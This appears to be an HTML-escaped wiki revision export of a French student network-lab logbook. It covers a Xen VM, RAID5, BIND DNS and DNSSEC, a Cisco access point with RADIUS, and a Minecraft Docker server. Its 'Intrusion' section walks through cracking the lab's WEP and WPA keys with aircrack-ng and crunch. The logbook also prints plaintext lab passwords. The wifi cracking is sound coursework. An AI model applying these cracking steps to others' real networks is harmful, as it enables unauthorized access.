* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/db.detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;$include &amp;amp;quot;/etc/bind/detestable.site.dnssec/detestable.site-ksk.key&amp;amp;quot;&lt;br /&gt;
$include &amp;amp;quot;/etc/bind/detestable.site.dnssec/detestable.site-zsk.key&amp;amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Signature des enregistrements de la zone :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-signzone -o detestable.site -k detestable.site-ksk ../db.detestable.site detestable.site-zsk&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;amp;quot;demineur.site&amp;amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;amp;quot;/etc/bind/db.detestable.site.signed&amp;amp;quot;;&lt;br /&gt;
    allow-transfer { 217.70.177.40; }; // ns6.gandi.net&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il ne reste plus qu’à communiquer la partie publique de la KSK (présente dans le fichier &amp;lt;code&amp;gt;detestable.site-ksk.key&amp;lt;/code&amp;gt;) à Gandi.&amp;lt;br /&amp;gt;&lt;br /&gt;
L’algorithme utilisé est le 8 (RSA/SHA-256).&lt;br /&gt;
&lt;br /&gt;
=== Tester DNSSEC : ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;cd /etc/bind/&lt;br /&gt;
dnssec-verify -o detestable.site db.detestable.site.signed&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 restart&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Vérifier son DNS avec dnsviz ===&lt;br /&gt;
[[Fichier:dnsviz_detestable.png]]&lt;br /&gt;
&lt;br /&gt;
=Connexion wifi=&lt;br /&gt;
==Point d'accès wifi==&lt;br /&gt;
Paramètres de minicom&lt;br /&gt;
 Serial Device : /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
Mode terminal&lt;br /&gt;
 ap&amp;amp;gt;enable&lt;br /&gt;
 ap#configure terminal&lt;br /&gt;
&lt;br /&gt;
Configuration du nom d’hôte :&lt;br /&gt;
 &amp;lt;pre&amp;gt;ap(config)#hostname SE2A5-AP1&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Accès SSH :&lt;br /&gt;
 SE2A5-AP1(config)#aaa new-model&lt;br /&gt;
 SE2A5-AP1(config)#username admin privilege 15 secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#ip domain-name plil.info&lt;br /&gt;
 SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048&lt;br /&gt;
 SE2A5-AP1(config)#ip ssh version 2&lt;br /&gt;
 SE2A5-AP1(config)#line vty 0 15&lt;br /&gt;
 SE2A5-AP1(config-line)#transport input ssh&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
Accès console :&lt;br /&gt;
 SE2A5-AP1(config)#line console 0&lt;br /&gt;
 SE2A5-AP1(config-line)#password glopglop&lt;br /&gt;
 SE2A5-AP1(config-line)#login authentification default&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
Sécurisation des accès :&lt;br /&gt;
 SE2A5-AP1(config)#service password-encryption&lt;br /&gt;
 SE2A5-AP1(config)#enable secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#banner motd #Restricted Access#&lt;br /&gt;
&lt;br /&gt;
VLAN n°20&lt;br /&gt;
 &amp;lt;SE2A5-AP1(config)#aaa authentication login EAP_toto group RADIUS_toto&lt;br /&gt;
 SE2A5-AP1(config)#radius-server host 193.48.57.163 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
 SE2A5-AP1(config)#aaa group server radius RADIUS_toto&lt;br /&gt;
 SE2A5-AP1(config-server)#server 193.48.57.163 auth-port 1812 acct-port 1813&lt;br /&gt;
 SE2A5-AP1(config-server)#exit&lt;br /&gt;
 SE2A5-AP1(config)#dot11 ssid SE2A5_1&lt;br /&gt;
 SE2A5-AP1(config-ssid)#vlan 20&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication open eap EAP_toto&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication network-eap EAP_toto&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication key-management wpa&lt;br /&gt;
 SE2A5-AP1(config-ssid)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface dot11radio0.20&lt;br /&gt;
 SE2A5-AP1(config-subif)#encapsulation dot1q 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#bridge-group 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface g0.20&lt;br /&gt;
 SE2A5-AP1(config-subif)#encapsulation dot1q 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#bridge-group 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface dot11radio 0&lt;br /&gt;
 SE2A5-AP2(config-if)#no shutdown&lt;br /&gt;
 SE2A5-AP1(config-if)#encryption vlan 20 mode ciphers aes-ccm tkip&lt;br /&gt;
 SE2A5-AP1(config-if)#mbssid&lt;br /&gt;
 SE2A5-AP1(config-if)#ssid SE2A5_1&lt;br /&gt;
 SE2A5-AP1(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Paramètres de minicom&lt;br /&gt;
 Serial Device : /dev/ttyACM0&lt;br /&gt;
VLAN n°1 :&lt;br /&gt;
 SE2A5-AP1(config)#interface BVI 1&lt;br /&gt;
 SE2A5-AP1(config-if)#ip address 10.0.0.10 255.255.255.0&lt;br /&gt;
 SE2A5-AP1(config-if)#no shutdown&lt;br /&gt;
 SE2A5-AP1(config-if)#exit&lt;br /&gt;
 SE2A5-AP1(config)#ip default-gateway 10.0.0.1&lt;br /&gt;
&lt;br /&gt;
== Configuration du serveur RADIUS ==&lt;br /&gt;
&lt;br /&gt;
Le serveur RADIUS permet l’authentification des utilisateurs qui se connectent aux points d’accès Wifi (WPA-EAP).&lt;br /&gt;
&lt;br /&gt;
* Installer le paquet &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;apt install freeradius&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modifier le fichier &amp;lt;code&amp;gt;/etc/freeradius/clients.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;client SE2A51 {&lt;br /&gt;
        ipaddr  = 10.0.0.10&lt;br /&gt;
        secret  = glopglop&lt;br /&gt;
}&lt;br /&gt;
}&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Ajouter un utilisateur en modifiant le fichier &amp;lt;code&amp;gt;/etc/freeradius/3.0/users&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;pifou Cleartext-Password := &amp;amp;quot;pasglop&amp;amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modifier le fichier &amp;lt;code&amp;gt;/etc/freeradius/3.0/mods-enables/eap&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;eap {&lt;br /&gt;
  default_eap_type = peap&lt;br /&gt;
  ...&lt;br /&gt;
}&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Arrêter le service &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; durant la phase de tests :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service freeradius stop&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Démarrer &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; en mode debug :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;freeradius -X&amp;lt;/pre&amp;gt;&lt;br /&gt;
Pendant que &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; est en mode debug, tenter de se connecter au réseau Wifi qui a été créé et vérifier que celle-ci est prise en compte.&amp;lt;br /&amp;gt;&lt;br /&gt;
[[Fichier:freeradius_X.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On peut également voir la connexion de l'appareil sur minicom&lt;br /&gt;
&lt;br /&gt;
[[Fichier:connexion_minicom.png]]&lt;br /&gt;
&lt;br /&gt;
Si la connexion est validée alors la configuration est correcte. Dans ce cas, arrêter le programme de debug et réactiver le service.&lt;br /&gt;
&lt;br /&gt;
* Redémarrer le service &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service freeradius start&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Intrusion =&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WEP ==&lt;br /&gt;
&lt;br /&gt;
Pour casser une clé WEP il nous faut le logiciel Aircrack:&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abord se mettre sur la bonne interface ethernet:&lt;br /&gt;
 airmon-ng start wlan0mon&lt;br /&gt;
&lt;br /&gt;
On se met ensuite en écoute sur ce réseau en indiquant le cryptage (WEP)&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On recupere ensuite l'ESSID et le BSSID correspondant a notre groupe (Groupe 1)&lt;br /&gt;
&lt;br /&gt;
(Ne pas juger la qualité du photographe)&lt;br /&gt;
[[Fichier:WEP_Liste.jpg]]&lt;br /&gt;
&lt;br /&gt;
On s'identifie&lt;br /&gt;
 aireplay-ng -9 -e cracotte01 -a 04:DA:D2:9C:50:50 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous recuperons ensuite les VI que l'on stock dans un fichier qui nous permettera de casser la clé :&lt;br /&gt;
 airodump-ng -c 4 --bssid 04:DA:D2:9C:50:50 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous procédons maintenant a la fausse identification: &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte01 -a 04:DA:D2:9C:50:50 -h 40:A5:EF:01:21:80 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu'a lancer le crack de la clé &lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:50 output*.cap&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Resultat: &lt;br /&gt;
&lt;br /&gt;
[[Fichier:cléWEP.jpeg]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WPA ==&lt;br /&gt;
&lt;br /&gt;
Nous allons utiliser le même logiciel que pour WEP (aircrack)&lt;br /&gt;
&lt;br /&gt;
Pour recuperer la clé WPA, il faut attendre un handshake de krakote01&lt;br /&gt;
 airodump-ng wlx40a5efd2140c --essid kracotte01 -c 4 -w /tmp/wpa&lt;br /&gt;
&lt;br /&gt;
Une fois le handshake recuperer nous allons generer un dictionvaire de mot de passe (ici une combinaison de 8 chiffres)&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Il nous reste plus qu'a utiliser aircrack comme ceci&lt;br /&gt;
 aircrack-ng -w password.lst wpa02.cap&lt;br /&gt;
&lt;br /&gt;
Il faut desormais être patient et attendre 5h40 pour essayer tout le dictionnaire.&lt;br /&gt;
&lt;br /&gt;
Un essaie en subdivisant a été fait mais sans resultat dans le temp imparti&lt;br /&gt;
&lt;br /&gt;
Après 4 heures 1 minutes et 29 seconde nous avons la clé: &lt;br /&gt;
 66699666&lt;br /&gt;
&lt;br /&gt;
[[Fichier:WPA_crack.png]]&lt;br /&gt;
&lt;br /&gt;
=MINECRAFT=&lt;br /&gt;
&lt;br /&gt;
Nous allons installer un serveur minecraft sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour cela nous allons avoir besoin de DOCKER&lt;br /&gt;
 apt-get install docker&lt;br /&gt;
&lt;br /&gt;
Une fois l'installation faite nous devons prendre une image de serveur minecraft:&lt;br /&gt;
 docker run -d -it -p 25565:25565 -e EULA=TRUE itzg/minecraft-server&lt;br /&gt;
&lt;br /&gt;
Cette image vient du github: https://github.com/itzg/docker-minecraft-server&lt;br /&gt;
&lt;br /&gt;
Nous mettons le port 25565 car c'est le port utilisé par minecraft&lt;br /&gt;
&lt;br /&gt;
Une fois cela fait nous pouvons visualiser les docker activité&lt;br /&gt;
 docker ps &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:docker_minecraft.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Connexion==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter il suffit d'avoir un minecraft et de renseigner l'IP du serveur&lt;br /&gt;
&lt;br /&gt;
[[Fichier:minecraft_pc.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le problème avec ce serveur minecraft est sa gourmandise en memoire. En effet, celui-ci plante lorsqu'il y a trop de redstone sur le serveur ou qu'il y a une trop grosse explosion de TNT.&lt;br /&gt;
&lt;br /&gt;
Cela doit être dû (pour la TNT) a un trop gros changement de map et besoin d'affichage qui nécessite trop de mémoire vive.&lt;br /&gt;
&lt;br /&gt;
Pour la redstone, étant donné que nous avons essayé de recréer des portes logique, cela devait trop &amp;quot;consommer&amp;quot;&lt;/div&gt;</summary>
		<author><name>Amace</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60283</id>
		<title>TP sysres SE2a5 2022/2023 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60283"/>
				<updated>2022-11-29T00:05:26Z</updated>
		
		<summary type="html">&lt;p&gt;Amace : /* Sécurisation des données - RAID5 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;br /&gt;
== Cahier de suivi - Groupe 1 ==&lt;br /&gt;
= Sommaire =&lt;br /&gt;
&lt;br /&gt;
* [[#plan-dadressage|Plan d’adressage]]&lt;br /&gt;
* [[#machine-virtuelle|Machine Virtuelle]]&lt;br /&gt;
* [[#Intrusion|Intrusion]]&lt;br /&gt;
&lt;br /&gt;
= Plan d’adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM !! @IPv4 MV non routée !! @IPv4 MV  routée !! Nom de domaine !&lt;br /&gt;
|-&lt;br /&gt;
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Machine Virtuelle =&lt;br /&gt;
&lt;br /&gt;
== Création de la VM ==&lt;br /&gt;
&lt;br /&gt;
Pour créer la VM nous avons besoin de nous connecter sur Capbreton qui est le serveur qui va &amp;quot;heberger&amp;quot; notre VM xen&lt;br /&gt;
 ssh root@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
On crée ensuite notre vm avec :&lt;br /&gt;
 xen-create-image --hostname=HG --gateway=193.48.57.175 --ip=193.48.57.163 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Pour acceder à la console de notre vm il faut modifier le fichier de configuration de notre VM (/etc/xen/HG.cfg) en y rajoutant :&lt;br /&gt;
 vif=['mac=00:16:3E:82:3E:78,bridge=IMA2a5' ]&lt;br /&gt;
&lt;br /&gt;
On crée 2 LVM permettant par la suite d'y rattacher notre /home et notre /var :&lt;br /&gt;
 lvcreate -L10G -n HG-home storage&lt;br /&gt;
 lvcreate -L10G -n HG-var storage&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
              ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour demarrer notre VM nous utilisons :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
&lt;br /&gt;
Le -c sert a se connecter directement &lt;br /&gt;
&lt;br /&gt;
Une fois sur la console de la machine, on modifie /etc/fstab, qui gère le mount des partitions au démarrage. On y rajoute les deux entrées suivantes:&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults	0 2&lt;br /&gt;
 /dev/xvda4 /var  ext4 defaults	0 2&lt;br /&gt;
&lt;br /&gt;
On modifie également les partitions /dev/xvda3 et /dev/xvda4 en y ajoutant des filesystems de type ext4:&lt;br /&gt;
 mkfs.ext4 /dev/xdva3&lt;br /&gt;
&lt;br /&gt;
==Sécurisation des données - RAID5==&lt;br /&gt;
&lt;br /&gt;
On sécurise nos données à l'aide de RAID5&lt;br /&gt;
&lt;br /&gt;
Installer les paquets nécessaires sur la VM et capbreton :&lt;br /&gt;
 apt install mdadm&lt;br /&gt;
&lt;br /&gt;
Créer les partitions virtuelles pour le RAID :&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-1 virtual&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-2 virtual&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-3 virtual&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-1,xvdd1,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-2,xvdd2,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-3,xvdd3,w'&lt;br /&gt;
                ]&lt;br /&gt;
On redémarre la VM :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
Créer le RAID5 à l’aide de la commande mdadm :&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdd1 /dev/xvdd2 /dev/xvdd3&lt;br /&gt;
Formater la partition RAID5 :&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
Ajout de la partition au fichier /etc/fstab :&lt;br /&gt;
 /dev/md0 /media/raid ext4 defaults 0 1&lt;br /&gt;
On recharge les partitions afin de prendre en compte le RAID :&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
Vérification&lt;br /&gt;
&lt;br /&gt;
[[Fichier:RAID5_detestable.png]]&lt;br /&gt;
&lt;br /&gt;
== Serveur DNS ==&lt;br /&gt;
===DNS===&lt;br /&gt;
Dans un premier temps, on utilise le registrar [[gandi.net|Gandi]] afin de réserver le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt;.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une fois le nom de domaine réservé, il est alors possible de configurer les serveurs de noms et les Glue Records :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter le Glue Record vers &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt; afin d’associer le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; à l’adresse IP &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier les serveurs de noms pour utiliser &amp;lt;code&amp;gt;ns.detestable.site&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ns6.gandi.net&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Installation du paquet &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;apt install bind9&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 193.48.57.48&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;amp;quot;detestable.site&amp;amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;amp;quot;/etc/bind/db.detestable.site&amp;amp;quot;;&lt;br /&gt;
    allow-transfer { 217.70.177.40; }; // ns6.gandi.net&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.options&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;options{&lt;br /&gt;
  directory &amp;amp;quot;/var/cache/bind&amp;amp;quot;;&lt;br /&gt;
  dnssec-validation auto;&lt;br /&gt;
  listen-on-v6 { any; };&lt;br /&gt;
  allow-transfer { &amp;amp;quot;allowed_to_transfer&amp;amp;quot;; };&lt;br /&gt;
};&lt;br /&gt;
acl &amp;amp;quot;allowed_to_transfer&amp;amp;quot; {&lt;br /&gt;
  193.48.57.0/24;&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Créer le fichier BIND pour &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;cp /etc/bind/db.local /etc/bind/db.detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/db.detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;;&lt;br /&gt;
; BIND data file for detestable.site&lt;br /&gt;
;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.detestable.site. root.detestable.site. (&lt;br /&gt;
                              3         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
@   IN  NS  ns.detestable.site.&lt;br /&gt;
@   IN  NS  ns6.gandi.net.&lt;br /&gt;
@   IN  A   193.48.57.163&lt;br /&gt;
NS  IN  A   193.48.57.163&lt;br /&gt;
NS  IN  AAAA    2001:660:4401:60a0:216:3eff:fe82:3e78&lt;br /&gt;
WWW IN  CNAME   NS&lt;br /&gt;
SSH IN  CNAME   NS&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Redémarrage du service &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 restart&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Tester DNS : ===&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 193.48.57.163&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Vérification de la traduction du nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nslookup detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===DNSSEC===&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.options&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-enable yes;&lt;br /&gt;
dnssec-validation yes;&lt;br /&gt;
dnssec-lookaside auto;&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Création du répertoire &amp;lt;code&amp;gt;detestable.site.dnssec&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;mkdir /etc/bind/detestable.site.dnssec/&lt;br /&gt;
cd /etc/bind/detestable.site.dnssec/&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Génération de la clef asymétrique de signature de clefs de zone :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-keygen -a RSASHA256 -b 2048 -f KSK -n ZONE detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;mv Kdetestable.site.*.key detestable.site-ksk.key&lt;br /&gt;
mv Kdetestable.site.*.private detestable.site-ksk.private&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Génération de la clef asymétrique de signature des enregistrements :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-keygen -a RSASHA256 -b 2048 -n ZONE detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;mv Kdetestable.site.*.key detestable.site-zsk.key&lt;br /&gt;
mv Kdetestable.site.*.private detestable.site-zsk.private&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/db.detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;$include &amp;amp;quot;/etc/bind/detestable.site.dnssec/detestable.site-ksk.key&amp;amp;quot;&lt;br /&gt;
$include &amp;amp;quot;/etc/bind/detestable.site.dnssec/detestable.site-zsk.key&amp;amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Signature des enregistrements de la zone :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-signzone -o detestable.site -k detestable.site-ksk ../db.detestable.site detestable.site-zsk&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;amp;quot;demineur.site&amp;amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;amp;quot;/etc/bind/db.detestable.site.signed&amp;amp;quot;;&lt;br /&gt;
    allow-transfer { 217.70.177.40; }; // ns6.gandi.net&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il ne reste plus qu’à communiquer la partie publique de la KSK (présente dans le fichier &amp;lt;code&amp;gt;detestable.site-ksk.key&amp;lt;/code&amp;gt;) à Gandi.&amp;lt;br /&amp;gt;&lt;br /&gt;
L’algorithme utilisé est le 8 (RSA/SHA-256).&lt;br /&gt;
&lt;br /&gt;
=== Tester DNSSEC : ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;cd /etc/bind/&lt;br /&gt;
dnssec-verify -o detestable.site db.detestable.site.signed&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 restart&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Vérifier son DNS avec dnsviz ===&lt;br /&gt;
[[Fichier:dnsviz_detestable.png]]&lt;br /&gt;
&lt;br /&gt;
=Connexion wifi=&lt;br /&gt;
==Point d'accès wifi==&lt;br /&gt;
Paramètres de minicom&lt;br /&gt;
 Serial Device : /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
Mode terminal&lt;br /&gt;
 ap&amp;amp;gt;enable&lt;br /&gt;
 ap#configure terminal&lt;br /&gt;
&lt;br /&gt;
Configuration du nom d’hôte :&lt;br /&gt;
 &amp;lt;pre&amp;gt;ap(config)#hostname SE2A5-AP1&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Accès SSH :&lt;br /&gt;
 SE2A5-AP1(config)#aaa new-model&lt;br /&gt;
 SE2A5-AP1(config)#username admin privilege 15 secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#ip domain-name plil.info&lt;br /&gt;
 SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048&lt;br /&gt;
 SE2A5-AP1(config)#ip ssh version 2&lt;br /&gt;
